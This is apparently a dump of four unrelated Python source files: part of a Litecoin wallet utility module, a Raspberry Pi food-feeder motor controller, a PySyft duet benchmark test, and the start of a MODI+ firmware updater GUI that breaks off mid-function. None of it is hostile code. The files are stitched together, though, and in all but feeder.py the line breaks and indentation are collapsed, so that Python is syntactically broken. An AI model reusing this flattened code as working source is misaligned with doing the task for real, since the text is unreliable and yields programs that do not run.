v[0] for k, v in pq.items()} if address: if not bitcoin.is_address(address): raise Exception("Invalid Litecoin address:" + address) out['address'] = address if 'amount' in out: am = out['amount'] m = re.match('([0-9\.]+)X([0-9])', am) if m: k = int(m.group(2)) - 8 amount = Decimal(m.group(1)) * pow( Decimal(10) , k) else: amount = Decimal(am) * COIN out['amount'] = int(amount) if 'message' in out: out['message'] = out['message'] out['memo'] = out['message'] if 'time' in out: out['time'] = int(out['time']) if 'exp' in out: out['exp'] = int(out['exp']) if 
'sig' in out: out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58)) r = out.get('r') sig = out.get('sig') name = out.get('name') if on_pr and (r or (name and sig)): def get_payment_request_thread(): from . import paymentrequest as pr if name and sig: s = pr.serialize_request(out).SerializeToString() request = pr.PaymentRequest(s) else: request = pr.get_payment_request(r) if on_pr: on_pr(request) t = threading.Thread(target=get_payment_request_thread) t.setDaemon(True) t.start() return out def create_URI(addr, amount, message): from . import bitcoin if not bitcoin.is_address(addr): return "" query = [] if amount: query.append('amount=%s'%format_satoshis_plain(amount)) if message: query.append('message=%s'%urllib.parse.quote(message)) p = urllib.parse.ParseResult(scheme='litecoin', netloc='', path=addr, params='', query='&'.join(query), fragment='') return urllib.parse.urlunparse(p) # Python bug (http://bugs.python.org/issue1927) causes raw_input # to be redirected improperly between stdin/stderr on Unix systems #TODO: py3 def raw_input(prompt=None): if prompt: sys.stdout.write(prompt) return builtin_raw_input() import builtins builtin_raw_input = builtins.input builtins.input = raw_input def parse_json(message): # TODO: check \r\n pattern n = message.find(b'\n') if n==-1: return None, message try: j = json.loads(message[0:n].decode('utf8')) except: j = None return j, message[n+1:] class timeout(Exception): pass import socket import json import ssl import time class SocketPipe: def __init__(self, socket): self.socket = socket self.message = b'' self.set_timeout(0.1) self.recv_time = time.time() def set_timeout(self, t): self.socket.settimeout(t) def idle_time(self): return time.time() - self.recv_time def get(self): while True: response, self.message = parse_json(self.message) if response is not None: return response try: data = self.socket.recv(1024) except socket.timeout: raise timeout except ssl.SSLError: raise timeout except socket.error as err: if 
err.errno == 60: raise timeout elif err.errno in [11, 35, 10035]: print_error("socket errno %d (resource temporarily unavailable)"% err.errno) time.sleep(0.2) raise timeout else: print_error("pipe: socket error", err) data = b'' except: traceback.print_exc(file=sys.stderr) data = b'' if not data: # Connection closed remotely return None self.message += data self.recv_time = time.time() def send(self, request): out = json.dumps(request) + '\n' out = out.encode('utf8') self._send(out) def send_all(self, requests): out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests)) self._send(out) def _send(self, out): while out: try: sent = self.socket.send(out) out = out[sent:] except ssl.SSLError as e: print_error("SSLError:", e) time.sleep(0.1) continue class QueuePipe: def __init__(self, send_queue=None, get_queue=None): self.send_queue = send_queue if send_queue else queue.Queue() self.get_queue = get_queue if get_queue else queue.Queue() self.set_timeout(0.1) def get(self): try: return self.get_queue.get(timeout=self.timeout) except queue.Empty: raise timeout def get_all(self): responses = [] while True: try: r = self.get_queue.get_nowait() responses.append(r) except queue.Empty: break return responses def set_timeout(self, t): self.timeout = t def send(self, request): self.send_queue.put(request) def send_all(self, requests): for request in requests: self.send(request) def setup_thread_excepthook(): """ Workaround for `sys.excepthook` thread bug from: http://bugs.python.org/issue1230540 Call once from the main thread before creating any threads. 
""" init_original = threading.Thread.__init__ def init(self, *args, **kwargs): init_original(self, *args, **kwargs) run_original = self.run def run_with_except_hook(*args2, **kwargs2): try: run_original(*args2, **kwargs2) except Exception: sys.excepthook(*sys.exc_info()) self.run = run_with_except_hook threading.Thread.__init__ = init def versiontuple(v): return tuple(map(int, (v.split(".")))) def import_meta(path, validater, load_meta): try: with open(path, 'r', encoding='utf-8') as f: d = validater(json.loads(f.read())) load_meta(d) #backwards compatibility for JSONDecodeError except ValueError: traceback.print_exc(file=sys.stderr) raise FileImportFailed(_("Invalid JSON code.")) except BaseException as e: traceback.print_exc(file=sys.stdout) raise FileImportFailed(e) def export_meta(meta, fileName): try: with open(fileName, 'w+', encoding='utf-8') as f: json.dump(meta, f, indent=4, sort_keys=True) except (IOError, os.error) as e: traceback.print_exc(file=sys.stderr) raise FileExportFailed(e)
feeder.py
import json
import math
import os.path
import sys
import threading
import time

import RPi.GPIO as GPIO
from gpiozero import MCP3008
from enum import Enum

# Constants
PWM_FREQUENCY = 50          # Hz for the motor PWM output
FLIPS = 6                   # flips per direction before wiggling again
ANTI_FLIP_MAX = 0.88        # max anticlockwise flip pulse (s) when struggling
ANTI_FLIP_TIME = 0.33       # normal anticlockwise flip pulse (s)
CLOCK_FLIP_MAX = 0.8        # max clockwise flip pulse (s) when struggling
CLOCK_FLIP_TIME = 0.3       # normal clockwise flip pulse (s)
WIGGLES = 6                 # wiggles per direction
ANTI_WIGGLE_TIME = 0.3      # 0.36
CLOCK_WIGGLE_TIME = 0.3
FED_TIMEOUT_SECS = 10       # give up this many seconds after target reached / event set
EMPTY_TIME = 1.5            # long pulse used for the final "is it empty?" test
LOW_POWER_SECS = 30         # after this long with no food detected, start ramping pulse length
HIGH_POWER_SECS = 90        # after this long, use maximum pulse length
EMPTY_TEST_SECS = 180       # after this long with no food detected, declare empty
JIGGLE_INTERVAL = 15        # alternate left/right emphasis every this many seconds
DEBUG_PIN = 6  # 31

# NOTE(review): GPIO.setmode() is not called here — presumably done by the
# importing application before this module is imported; confirm.
GPIO.setup(DEBUG_PIN, GPIO.OUT)
GPIO.output(DEBUG_PIN, False)


class MotorState(Enum):
    """States of the dispensing motor state machine."""
    START = 0
    LEFTWIGGLE = 1
    RIGHTWIGGLE = 2
    LEFT = 3
    RIGHT = 4
    LEFTEMPTY = 5
    RIGHTEMPTY = 6
    COMPLETE = 7


class Feeder:
    """One feeder unit: a PWM-driven motor plus a piezo/ADC food sensor.

    A feed cycle runs three cooperating threads:

    * ``measureThread`` — pulses the sensor reset pin ~100 times/second and
      wakes ``adcThread``; also enforces the target amount and the
      ``FED_TIMEOUT_SECS`` timeout.
    * ``adcThread``    — samples the MCP3008, accumulates squared signal
      (noise-floor corrected) into ``self.sums``.
    * ``motorThread``  — drives the motor through the ``MotorState`` machine
      until ``self.motorevent`` is set.

    Persistent settings (dispense excess, calibration, error flags) are kept
    in ``<name>.conf`` as JSON.
    """

    def __init__(self, name, pwmpin, resetpin, adcchannel, clockwise,
                 anticlockwise, verbose):
        """Configure GPIO and ADC for one feeder.

        name          -- label, also used as the config file stem
        pwmpin        -- BCM pin driving the motor PWM
        resetpin      -- BCM pin that resets/charges the sensor
        adcchannel    -- MCP3008 channel for the sensor
        clockwise     -- PWM duty cycle (%) for clockwise rotation
        anticlockwise -- PWM duty cycle (%) for anticlockwise rotation
        verbose       -- 0 silent, 1 progress, >1 per-state trace
        """
        self.name = name
        self.empty = False
        self.running = False
        self.resetSettings()
        self.resetCalibration()
        self.resetpin = resetpin
        GPIO.setup(self.resetpin, GPIO.OUT)
        # Keep high to reduce current, power
        GPIO.output(self.resetpin, True)
        self.pwmpin = pwmpin
        GPIO.setup(pwmpin, GPIO.OUT)
        self.pwm = GPIO.PWM(pwmpin, PWM_FREQUENCY)
        self.pwm.start(0)
        self.motorstate = MotorState.START
        self.motorstatecounter = 0
        self.adcchannel = adcchannel
        self.adc = MCP3008(channel=adcchannel, device=0)
        self.adcevent = threading.Event()
        self.motorevent = threading.Event()
        self.clockwise = clockwise
        self.anticlockwise = anticlockwise
        self.verbose = verbose
        self.load()

    def setupStates(self):
        """(Re)build the state table; durations are mutated during a feed."""
        self.states = {
            MotorState.START: {"pwm": 0, "duration": 0, "repeat": 0,
                               "right": True, "fn": self.stateStart},
            MotorState.LEFTWIGGLE: {"pwm": self.anticlockwise,
                                    "duration": ANTI_WIGGLE_TIME,
                                    "repeat": WIGGLES, "right": False,
                                    "fn": self.stateWiggle},
            MotorState.RIGHTWIGGLE: {"pwm": self.clockwise,
                                     "duration": CLOCK_WIGGLE_TIME,
                                     "repeat": WIGGLES, "right": True,
                                     "fn": self.stateWiggle},
            MotorState.LEFT: {"pwm": self.anticlockwise,
                              "duration": ANTI_FLIP_TIME,
                              "repeat": FLIPS, "right": False,
                              "fn": self.stateFlip},
            MotorState.RIGHT: {"pwm": self.clockwise,
                               "duration": CLOCK_FLIP_TIME,
                               "repeat": FLIPS, "right": True,
                               "fn": self.stateFlip},
            MotorState.LEFTEMPTY: {"pwm": self.anticlockwise,
                                   "duration": EMPTY_TIME,
                                   "repeat": 0, "right": False,
                                   "fn": self.stateEmpty},
            MotorState.RIGHTEMPTY: {"pwm": self.clockwise,
                                    "duration": EMPTY_TIME,
                                    "repeat": 0, "right": True,
                                    "fn": self.stateEmpty},
            MotorState.COMPLETE: {"pwm": 0, "duration": 0, "repeat": 0,
                                  "fn": None},
        }

    def initFeed(self, weight):
        """Prepare a feed of `weight` grams: start the measuring threads,
        settle for 5 s to establish the noise floor, and create (but do not
        start) the motor thread. Call startFeed() afterwards."""
        self.running = True
        self.lastempty = self.lasttime = time.time()
        self.setupStates()
        self.sums = 0
        self.counts = 0
        self.total = 0
        self.ms = 0
        # Alternate the starting direction between feeds to even out wear.
        self.right = not self.right
        self.motor = None
        self.motorstate = MotorState.START
        self.weight = weight
        self.feeding = False
        self.error = False
        excess = self.excess
        # Limit the excess each time to half a meal either way
        # We should eventually catch up
        excess = max(min(excess, weight / 2), -weight / 2)
        self.target = self.targetFromWeight(weight - excess)
        if self.verbose > 0:
            print("Current target {0:.2f} which is {1:.2f}g total excess {2:.2f}".format(self.target, weight - excess, self.excess))
        self.motorevent.clear()
        self.adcthread = threading.Thread(target=self.adcThread)
        #self.adcthread.daemon = True
        self.adcthread.start()
        self.measure = threading.Thread(target=self.measureThread)
        self.measure.start()
        # Let the ADC sample quiescent noise before computing the noise floor.
        time.sleep(5)
        self.meansquared()
        self.motor = threading.Thread(target=self.motorThread)
        #self.motor.daemon = True
        if self.verbose:
            print("Init feed done {0}".format(self.name))

    def startFeed(self):
        """Start dispensing (motor thread created by initFeed)."""
        self.motor.start()

    def join(self):
        """Block until all three feed threads have finished."""
        self.measure.join()
        self.motor.join()
        self.adcthread.join()

    def stop(self):
        """Abort the current feed by signalling the motor event."""
        self.motorevent.set()
        self.lasttime = time.time()  # ???
        if self.verbose > 0:
            print("stop(): self.motorevent.set()")

    def meansquared(self):
        """Compute and reset the mean-squared noise floor from the samples
        accumulated so far. Assumes at least one sample has been taken."""
        self.ms = self.sums / self.counts
        self.sums = 0
        self.counts = 0
        # Ensure calms cannot be 0 before divide
        if not self.calms:
            self.calms = self.ms
        if self.verbose:
            print("Mean squared {0:.2e} cal {1:.2e} ratio {2:.2e}".format(self.ms, self.calms, self.ms / self.calms))
        return self.ms

    def measureThread(self):
        """Sensor pacing loop: pulse the reset pin, wake adcThread, stop the
        feed when the target is reached or it times out, then persist the
        dispensed/excess bookkeeping."""
        if self.verbose:
            print("measureThread {0} {1}".format(self.resetpin, self.adcchannel))
        while self.running:
            if self.running:
                # Discharge/charge the sensor, then let adcThread take a sample.
                GPIO.output(self.resetpin, False)
                time.sleep(0.0005)
                GPIO.output(self.resetpin, True)
                time.sleep(0.0095 - 0.0005)
                self.adcevent.set()
                time.sleep(0.0005)
                # Don't check the event if the motor isn't running
                if self.motor != None and not self.motorevent.is_set() and self.sums >= self.target:
                    self.motorevent.set()
                    self.lasttime = time.time()  # ???
                    if self.verbose > 0:
                        print("measureThread() 1: self.motorevent.set()")
            if self.running:
                # Cope with timeout
                self.running = not (self.motorevent.is_set() and (time.time() - self.lasttime) > FED_TIMEOUT_SECS)
                if not self.running:
                    self.motorevent.set()
                    self.adcevent.set()
                    if self.verbose > 0:
                        print("measureThread() 2: self.motorevent.set()")
        # Keep high to reduce current, power
        GPIO.output(self.resetpin, True)
        self.dispensed = self.weightFromTarget(self.sums)
        # Carry over the over/under-shoot so the next feed compensates.
        self.excess = self.dispensed - (self.weight - self.excess)
        # Exponential moving average of dispensed weight (alpha = 0.2).
        self.avg = self.dispensed if self.avg == 0 else (self.avg * 0.8) + (self.dispensed * 0.2)
        self.save()
        if self.verbose:
            print("measureThread ends {0}".format(self.running))

    def adcThread(self):
        """Sampling loop: on each wake-up accumulate the squared ADC reading
        (minus the noise floor); a strong sample (> 0.5) means food was
        detected, so reset the empty timers and restore normal flip times."""
        if self.verbose:
            print("adcThread reset {0} adc {1}".format(self.resetpin, self.adcchannel))
        while self.running:
            self.adcevent.wait()
            self.adcevent.clear()
            GPIO.output(DEBUG_PIN, True)
            a = self.adc.value
            a2 = a * a
            # Count all datapoints minus mean squared noise
            self.sums += a2 - self.ms
            self.counts += 1
            if a > 0.5:
                # Food seen: restart the empty/timeout clocks and drop back
                # to normal-power flips.
                self.lastempty = self.lasttime = time.time()
                self.states[MotorState.LEFT]["duration"] = ANTI_FLIP_TIME
                self.states[MotorState.RIGHT]["duration"] = CLOCK_FLIP_TIME
            self.total += 1
            GPIO.output(DEBUG_PIN, False)
        if self.verbose:
            print("adcThread ends")

    def motorThread(self):
        """Motor loop: run the state machine until motorevent is set, driving
        the PWM with each state's duty cycle for its duration."""
        if self.verbose:
            print("motorThread {0}".format(self.pwmpin))
        self.feeding = True
        self.save()
        while not self.motorevent.is_set():
            state = self.states[self.motorstate]
            state["fn"](state)          # may change self.motorstate
            state = self.states[self.motorstate]
            if self.verbose > 1:
                print("{0} {1} {2} {3}".format(self.motorstate, state["pwm"], state["duration"], self.motorstatecounter))
            self.pwm.ChangeDutyCycle(state["pwm"])
            self.motorevent.wait(state["duration"])
        self.feeding = False
        # Whatever state we end in set pwm to 0
        self.pwm.ChangeDutyCycle(0)

    def stateStart(self, state):
        """Begin with a wiggle in this feed's starting direction."""
        self.motorstate = MotorState.RIGHTWIGGLE if self.right else MotorState.LEFTWIGGLE
        self.motorstatecounter = self.states[self.motorstate]["repeat"]

    def stateWiggle(self, state):
        """Repeat the wiggle `repeat` times, then switch to flipping the
        opposite way."""
        if self.checkCounter():
            self.motorstate = MotorState.LEFT if state["right"] else MotorState.RIGHT
            self.motorstatecounter = self.states[self.motorstate]["repeat"]
        else:
            self.motorstate = MotorState.LEFTWIGGLE if state["right"] else MotorState.RIGHTWIGGLE

    def stateFlip(self, state):
        """Repeat the flip `repeat` times (unless the empty test fires), then
        go back to wiggling the opposite way."""
        if self.checkEmpty(state):
            return
        if self.checkCounter():
            self.motorstate = MotorState.LEFTWIGGLE if state["right"] else MotorState.RIGHTWIGGLE
            self.motorstatecounter = self.states[self.motorstate]["repeat"]
        else:
            self.motorstate = MotorState.LEFT if state["right"] else MotorState.RIGHT

    def stateEmpty(self, state):
        """Final empty-test pulse produced no food: flag the feeder empty and
        finish the feed."""
        # Guard just in case event has been set asynchronously.
        # BUGFIX: was `if not self.motorevent.set():` — Event.set() returns
        # None (so the guard was always true) AND set the event as a side
        # effect; is_set() is the intended query.
        if not self.motorevent.is_set():
            self.lasttime = time.time()  # ???
            self.motorevent.set()
            self.empty = True
            self.error = True
            if self.verbose > 0:
                print("stateEmpty(): self.motorevent.set()")
        self.motorstate = MotorState.COMPLETE

    def checkCounter(self):
        """Decrement the per-state repeat counter; True when it is exhausted."""
        if self.motorstatecounter > 1:
            self.motorstatecounter -= 1
            return False
        else:
            return True

    def checkEmpty(self, state):
        """Escalate motor effort the longer we go without detecting food.

        > EMPTY_TEST_SECS          -- switch to the long empty-test pulse
                                      (returns True: caller must not advance)
        > HIGH_POWER_SECS          -- alternate max-length pulses left/right
        LOW_POWER_SECS..HIGH_POWER -- linearly ramp the pulse length
        """
        dt = time.time() - self.lastempty
        if dt > EMPTY_TEST_SECS:
            self.motorstate = MotorState.LEFTEMPTY if self.motorstate == MotorState.RIGHT else MotorState.RIGHTEMPTY
            self.motorstatecounter = self.states[self.motorstate]["repeat"]
            self.lastempty = time.time()
            return True
        elif dt > HIGH_POWER_SECS:
            # Pull hard one way at a time, alternating every JIGGLE_INTERVAL.
            if int(dt / JIGGLE_INTERVAL) % 2 == 0:
                self.states[MotorState.LEFT]["duration"] = ANTI_FLIP_MAX
                self.states[MotorState.RIGHT]["duration"] = CLOCK_FLIP_TIME
            else:
                self.states[MotorState.LEFT]["duration"] = ANTI_FLIP_TIME
                self.states[MotorState.RIGHT]["duration"] = CLOCK_FLIP_MAX
        elif dt > LOW_POWER_SECS and dt <= HIGH_POWER_SECS:
            # Pull left for a bit, then right, ramping from normal to max.
            if int(dt / JIGGLE_INTERVAL) % 2 == 0:
                self.states[MotorState.LEFT]["duration"] = ((ANTI_FLIP_MAX - ANTI_FLIP_TIME) * (dt - LOW_POWER_SECS) / (HIGH_POWER_SECS - LOW_POWER_SECS)) + ANTI_FLIP_TIME
                self.states[MotorState.RIGHT]["duration"] = CLOCK_FLIP_TIME
            else:
                self.states[MotorState.LEFT]["duration"] = ANTI_FLIP_TIME
                self.states[MotorState.RIGHT]["duration"] = ((CLOCK_FLIP_MAX - CLOCK_FLIP_TIME) * (dt - LOW_POWER_SECS) / (HIGH_POWER_SECS - LOW_POWER_SECS)) + CLOCK_FLIP_TIME
        return False

    def targetFromWeight(self, weight):
        """Convert grams to sensor target units using the calibration."""
        return (weight * self.scaletarget) / self.scaleweight

    def weightFromTarget(self, target):
        """Convert sensor units back to grams using the calibration."""
        return (target * self.scaleweight) / self.scaletarget

    def load(self):
        """Load persisted settings from <name>.conf if it exists."""
        n = self.name + ".conf"
        if not os.path.exists(n):
            return
        s = ""
        with open(n) as f:
            s = f.read()
        settings = json.loads(s)
        self.right = settings["right"]
        self.excess = settings["excess"]
        self.avg = settings["avg"]
        self.scaleweight = settings["scaleweight"]
        self.scaletarget = settings["scaletarget"]
        self.calms = settings["calms"]
        self.feeding = settings["feeding"]
        self.error = settings["error"]

    def save(self):
        """Persist current settings to <name>.conf as JSON."""
        settings = {
            "right": self.right,
            "excess": self.excess,
            "avg": self.avg,
            "scaleweight": self.scaleweight,
            "scaletarget": self.scaletarget,
            "calms": self.calms,
            "feeding": self.feeding,
            "error": self.error,
        }
        with open(self.name + ".conf", "w") as f:
            f.write(json.dumps(settings))

    def resetSettings(self):
        """Reset the per-feed bookkeeping to defaults."""
        self.right = False
        self.excess = 0.0
        self.avg = 0.0
        self.dispensed = 0.0
        self.feeding = False
        self.error = False

    def resetCalibration(self):
        """Reset the grams <-> sensor-units calibration to defaults."""
        self.scaleweight = 25.0
        self.scaletarget = 3  # 10 # 30 # 6
        #self.calms = 0

    def calibrate(self, weight, target):
        """Record that `target` sensor units corresponded to `weight` grams."""
        self.scaleweight = weight
        self.scaletarget = target

    def info(self):
        """Print a one-line status summary for this feeder."""
        print("{0} dispensed {1:.2f} average {2:.2f} excess {3:.2f} scaleweight {4:.2f} scaletarget {5:.2f} calms {6:.2e} error {7}".
              format(self.name, self.dispensed, self.avg, self.excess, self.scaleweight, self.scaletarget, self.calms, self.error))


# NOTE(review): stray module-level __init__ — never called by anything visible
# here and shadows nothing useful; kept only to preserve the module namespace.
# Consider deleting it.
def __init__():
    return
benchmark_send_get_multiprocess_test.py
# stdlib import socket import time from typing import Any from typing import List # syft absolute from syft.lib.python import List as SyList from syft.lib.python.string import String # relative from ...syft.grid.duet.process_test import SyftTestProcess def do_send(data: Any, port: int) -> None: # syft absolute import syft as sy duet = sy.launch_duet(loopback=True, network_url=f"http://127.0.0.1:{port}/") duet.requests.add_handler(action="accept") _ = data.send(duet, pointable=True) sy.core.common.event_loop.loop.run_forever() def ds_get(data: Any, port: int) -> None: # syft absolute import syft as sy duet = sy.join_duet(loopback=True, network_url=f"http://127.0.0.1:{port}/") for retry in range(10): if len(duet.store) != 0: break time.sleep(0.1) assert len(duet.store) != 0 remote = duet.store[0].get(request_block=True, delete_obj=False) assert remote == data def run_endpoints(do_runner: Any, ds_runner: Any, data: Any, port: int) -> None: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: assert s.connect_ex(("localhost", port)) == 0 do_proc = SyftTestProcess(target=do_runner, args=(data, port)) do_proc.start() ds_proc = SyftTestProcess(target=ds_runner, args=(data, port)) ds_proc.start() ds_proc.join(120) do_proc.terminate() if do_proc.exception: exception, tb = do_proc.exception raise Exception(tb) from exception if ds_proc.exception: exception, tb = ds_proc.exception raise Exception(tb) from exception if ds_proc.is_alive(): ds_proc.terminate() raise Exception(f"ds_proc is hanged for {len(data)}") def send_get_string_multiprocess(data: String, port: int) -> None: run_endpoints(do_send, ds_get, String(data), port) def send_get_list_multiprocess(data: List[str], port: int) -> None: run_endpoints(do_send, ds_get, SyList(data), port)
modi2_firmware_updater.py
import io import os import pathlib import sys import threading as th import time import traceback as tb from PyQt5 import QtGui, QtWidgets, uic from PyQt5.QtCore import QObject, Qt, pyqtSignal, pyqtSlot from PyQt5.QtWidgets import QDialog, QMessageBox from modi2_firmware_updater.core.esp32_updater import ESP32FirmwareMultiUploder from modi2_firmware_updater.core.module_updater import ModuleFirmwareMultiUpdater from modi2_firmware_updater.core.network_updater import NetworkFirmwareMultiUpdater from modi2_firmware_updater.firmware_manager import FirmwareManagerForm from modi2_firmware_updater.update_list_form import ESP32UpdateListForm, ModuleUpdateListForm from modi2_firmware_updater.util.modi_winusb.modi_serialport import list_modi_serialports from modi2_firmware_updater.util.platform_util import is_raspberrypi, set_delay_option class StdoutRedirect(QObject): printOccur = pyqtSignal(str, str, name="print") def __init__(self): QObject.__init__(self, None) self.daemon = True self.sysstdout = sys.stdout.write self.sysstderr = sys.stderr.write def stop(self): sys.stdout.write = self.sysstdout sys.stderr.write = self.sysstderr def start(self): sys.stdout.write = self.write sys.stderr.write = lambda msg: self.write(msg, color="red") def write(self, s, color="black"): sys.stdout.flush() self.printOccur.emit(s, color) class PopupMessageBox(QtWidgets.QMessageBox): def __init__(self, main_window, level): QtWidgets.QMessageBox.__init__(self) self.window = main_window self.setSizeGripEnabled(True) self.setWindowTitle("System Message") def error_popup(): self.setIcon(self.Icon.Warning) self.setText("ERROR") def warning_popup(): self.setIcon(self.Icon.Information) self.setText("WARNING") self.addButton("Ok", self.ActionRole) func = { "error": error_popup, "warning": warning_popup, }.get(level) func() close_btn = self.addButton("Exit", self.ActionRole) close_btn.clicked.connect(self.close_btn) self.show() def event(self, e): MAXSIZE = 16_777_215 MINHEIGHT = 100 MINWIDTH = 200 
MINWIDTH_CHANGE = 500 result = QtWidgets.QMessageBox.event(self, e) self.setMinimumHeight(MINHEIGHT) self.setMaximumHeight(MAXSIZE) self.setMinimumWidth(MINWIDTH) self.setMaximumWidth(MAXSIZE) self.setSizePolicy( QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding ) textEdit = self.findChild(QtWidgets.QTextEdit) if textEdit is not None: textEdit.setMinimumHeight(MINHEIGHT) textEdit.setMaximumHeight(MAXSIZE) textEdit.setMinimumWidth(MINWIDTH_CHANGE) textEdit.setMaximumWidth(MAXSIZE) textEdit.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding,) return result def close_btn(self): self.window.close() class ThreadSignal(QObject): thread_error = pyqtSignal(object) thread_signal = pyqtSignal(object) def __init__(self): super().__init__() class Form(QDialog): """ GUI Form of MODI+ Firmware Updater """ def __init__(self, debug=False, multi=True): QDialog.__init__(self) self.__excepthook = sys.excepthook sys.excepthook = self.__popup_excepthook th.excepthook = self.__popup_thread_excepthook self.err_list = list() self.is_popup = False self.is_debug = debug self.is_multi = multi ui_path = os.path.join(os.path.dirname(__file__), "assets", "main.ui") firmware_manager_ui_path = os.path.join(os.path.dirname(__file__), "assets", "firmware_manager.ui") esp32_update_list_ui_path = os.path.join(os.path.dirname(__file__), "assets", "esp32_update_list.ui") module_update_list_ui_path = os.path.join(os.path.dirname(__file__), "assets", "module_update_list.ui") if sys.platform.startswith("win"): self.component_path = pathlib.PurePosixPath(pathlib.PurePath(__file__), "..", "assets", "component") else: self.component_path = os.path.join(os.path.dirname(__file__), "assets", "component") self.ui = uic.loadUi(ui_path) self.assets_firmware_path = os.path.join(os.path.dirname(__file__), "assets", "firmware") self.local_firmware_path = os.path.join(os.path.expanduser("~"), "Documents", "modi+ firmware updater") self.module_firmware_directory = 
"module_firmware" self.module_firmware_path = os.path.join(self.local_firmware_path, self.module_firmware_directory) self.ui.setStyleSheet("background-color: white") # Set LUXROBO logo image logo_path = os.path.join(self.component_path, "luxrobo_logo.png") qPixmapVar = QtGui.QPixmap() qPixmapVar.load(logo_path) self.ui.lux_logo.setPixmap(qPixmapVar) self.firmware_manage_form = FirmwareManagerForm(path_dict={ "ui": firmware_manager_ui_path, "component": self.component_path, "assets_firmware": self.assets_firmware_path, "local_firmware": self.local_firmware_path, "firmware_directory": self.module_firmware_directory }) self.esp32_update_list_form = ESP32UpdateListForm(path_dict={ "ui": esp32_update_list_ui_path, "component": self.component_path, }) self.module_update_list_form = ModuleUpdateListForm(path_dict={ "ui": module_update_list_ui_path, "component": self.component_path, }) # Buttons image self.active_path = pathlib.PurePosixPath(self.component_path, "btn_frame_active.png") self.inactive_path = pathlib.PurePosixPath(self.component_path, "btn_frame_inactive.png") self.pressed_path = pathlib.PurePosixPath(self.component_path, "btn_frame_pressed.png") self.language_frame_path = pathlib.PurePosixPath(self.component_path, "lang_frame.png") self.language_frame_pressed_path = pathlib.PurePosixPath(self.component_path, "lang_frame_pressed.png") self.ui.update_network_module_button.setStyleSheet(f"border-image: url({self.active_path}); color: black;") self.ui.update_network_submodule_button.setStyleSheet(f"border-image: url({self.active_path}); color: black;") self.ui.delete_user_code_button.setStyleSheet(f"border-image: url({self.active_path}); color: black;") self.ui.update_general_modules_button.setStyleSheet(f"border-image: url({self.active_path}); color: black;") self.ui.manage_firmware_version_button.setStyleSheet(f"border-image: url({self.active_path}); color: black;") self.ui.translate_button.setStyleSheet(f"border-image: url({self.language_frame_path}); color: 
black;") self.ui.devmode_button.setStyleSheet(f"border-image: url({self.language_frame_path}); color: black;") self.ui.console.setStyleSheet(f"font-size: 10px; color: black") version_path = os.path.join(os.path.dirname(__file__), "..", "version.txt") with io.open(version_path, "r") as version_file: self.version_info = version_file.readline().rstrip("\n") if self.is_multi: self.ui.setWindowTitle("MODI+ Firmware Multi Updater - " + self.version_info) else: self.ui.setWindowTitle("MODI+ Firmware Updater - " + self.version_info) self.ui.setWindowIcon(QtGui.QIcon(os.path.join(self.component_path, "network_module.ico"))) self.ui.setWindowFlag(Qt.WindowMinimizeButtonHint, True) self.ui.setWindowFlag(Qt.WindowMaximizeButtonHint, True) # Redirect stdout to text browser (i.e. console in our UI) if not self.is_debug: self.stdout = StdoutRedirect() self.stdout.start() self.stdout.printOccur.connect(lambda line: self.__append_text_line(line)) # Set signal for thread communication self.stream = ThreadSignal() # Connect up the buttons self.ui.update_network_module_button.clicked.connect(self.update_network_module_button_clicked) self.ui.update_network_submodule_button.clicked.connect(self.update_network_submodule_button_clicked) self.ui.delete_user_code_button.clicked.connect(self.delete_user_code_button_clicked) self.ui.update_general_modules_button.clicked.connect(self.update_general_modules_button_clicked) self.ui.manage_firmware_version_button.clicked.connect(self.manage_firmware_version_button_clicked) self.ui.devmode_button.clicked.connect(self.devmode_button_clicked) self.ui.translate_button.clicked.connect(self.translate_button_clicked) self.buttons = [ self.ui.update_network_module_button, self.ui.update_network_submodule_button, self.ui.delete_user_code_button, self.ui.update_general_modules_button, self.ui.manage_firmware_version_button, self.ui.devmode_button, self.ui.translate_button, ] self.button_en = [ "Update Network Module", "Update Network Submodule", "Delete 
User Code", "Update General Modules", "Manage Module Firmware Version", "Show Detail", "한국어", ] self.button_kr = [ "네트워크 모듈 업데이트", "네트워크 서브 모듈 업데이트", "시용자 코드 삭제", "일반 모듈 업데이트", "펌웨어 관리", "자세히 보기", "English", ] # Disable the first button to be focused when UI is loaded self.ui.update_network_module_button.setAutoDefault(False) self.ui.update_network_module_button.setDefault(False) # Set up field variables self.firmware_updater = None self.button_in_english = False self.console = False # Set up ui field variables self.ui.is_english = False self.ui.active_path = self.active_path self.ui.pressed_path = self.pressed_path self.ui.language_frame_path = self.language_frame_path self.ui.language_frame_pressed_path = self.language_frame_pressed_path self.ui.stream = self.stream # check module firmware self.check_module_firmware() # Set Button Status self.refresh_button_text() self.refresh_console() # Set delay option delay_option = (self.is_multi==True) set_delay_option(delay_option) # check app update self.check_app_update() if is_raspberrypi(): self.ui.setMinimumSize(0, 0) self.ui.setWindowState(Qt.WindowMaximized) self.ui.show() # # Main methods # def update_network_module_button_clicked(self): button_start = time.time() if self.firmware_updater and self.firmware_updater.update_in_progress: if self.is_multi: self.module_update_list_form.ui.show() return self.ui.update_network_module_button.setStyleSheet(f"border-image: url({self.pressed_path}); color: black;") self.ui.console.clear() print("Network Firmware Updater has been initialized for base update!") th.Thread( target=self.__click_motion, args=(0, button_start), daemon=True ).start() modi_ports = list_modi_serialports() if not modi_ports: raise Exception("No MODI+ port is connected") if self.is_multi: self.module_update_list_form.ui.setWindowTitle("Update Network Modules") self.module_update_list_form.reset_device_list() firmware_version_info = self.firmware_manage_form.get_config_firmware_version_info() def 
